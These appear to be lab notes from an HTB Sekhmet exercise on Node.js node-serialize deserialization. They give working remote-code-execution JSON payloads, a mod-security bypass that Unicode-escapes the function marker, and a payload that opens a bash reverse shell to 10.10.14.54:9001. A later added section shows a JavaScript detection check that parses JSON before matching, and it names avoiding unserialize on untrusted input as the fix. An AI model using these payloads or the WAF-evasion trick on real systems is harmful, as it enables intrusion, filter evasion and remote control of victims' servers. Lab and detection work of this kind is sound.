Node.js Deserialization

{"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })}"}

Mod-security bypass

In the HTB Sekhmet lab, I was blocked by mod-security.

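How to bypass: change part of the payload to hexadecimal (JSON \uXXXX Unicode escapes). The WAF matches on the raw request text, while the JSON parser decodes the escapes back to the original characters.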

{"rce":"_$$ND_FUNC$$                // this function marker triggers the WAF
{"rce":"_$$\u004e\u0044_FUNC$$_\u0066unction(){ require('child_process').exec(\"bash -c 'bash -i >& /dev/tcp/10.10.14.54/9001 0>&1'\", function(error, stdout, stderr) { console.log(stdout) })}()"}
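
The detection side of this bypass, as an added example that is not part of the original notes: a raw substring rule misses the escaped marker, while a check that parses the JSON first sees the same string the application will see. The function names and the sample bodies (with a harmless function body) are constructed for illustration.

```javascript
// Marker that node-serialize uses to tag a serialized function.
const MARKER = '_$$ND_FUNC$$_';

// Naive check: substring match on the raw request body (what a byte-level rule sees).
function rawBodyHasMarker(body) {
  return body.includes(MARKER);
}

// Recursively collect every string (keys and values) from a parsed JSON value.
function collectStrings(value, out = []) {
  if (typeof value === 'string') {
    out.push(value);
  } else if (Array.isArray(value)) {
    for (const item of value) collectStrings(item, out);
  } else if (value !== null && typeof value === 'object') {
    for (const [key, item] of Object.entries(value)) {
      out.push(key);
      collectStrings(item, out);
    }
  }
  return out;
}

// Decoded check: parse first, then inspect the strings the application will actually see.
// Returns 'reject' for unparseable bodies so malformed input fails closed.
function inspectBody(body) {
  let parsed;
  try {
    parsed = JSON.parse(body);
  } catch {
    return 'reject';
  }
  return collectStrings(parsed).some((s) => s.includes(MARKER)) ? 'block' : 'allow';
}

// Constructed sample bodies; String.raw keeps the \uXXXX escapes as literal text.
const plain = String.raw`{"rce":"_$$ND_FUNC$$_function(){ return 1 }"}`;
const escaped = String.raw`{"rce":"_$$\u004e\u0044_FUNC$$_\u0066unction(){ return 1 }"}`;
const benign = String.raw`{"username":"alice","note":"hello"}`;

for (const [name, body] of Object.entries({ plain, escaped, benign })) {
  console.log(name, 'raw match:', rawBodyHasMarker(body), 'decoded verdict:', inspectBody(body));
}
```

A marker filter like this is defense in depth only; the actual fix is to never pass untrusted input to node-serialize's unserialize().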

Basic explanation
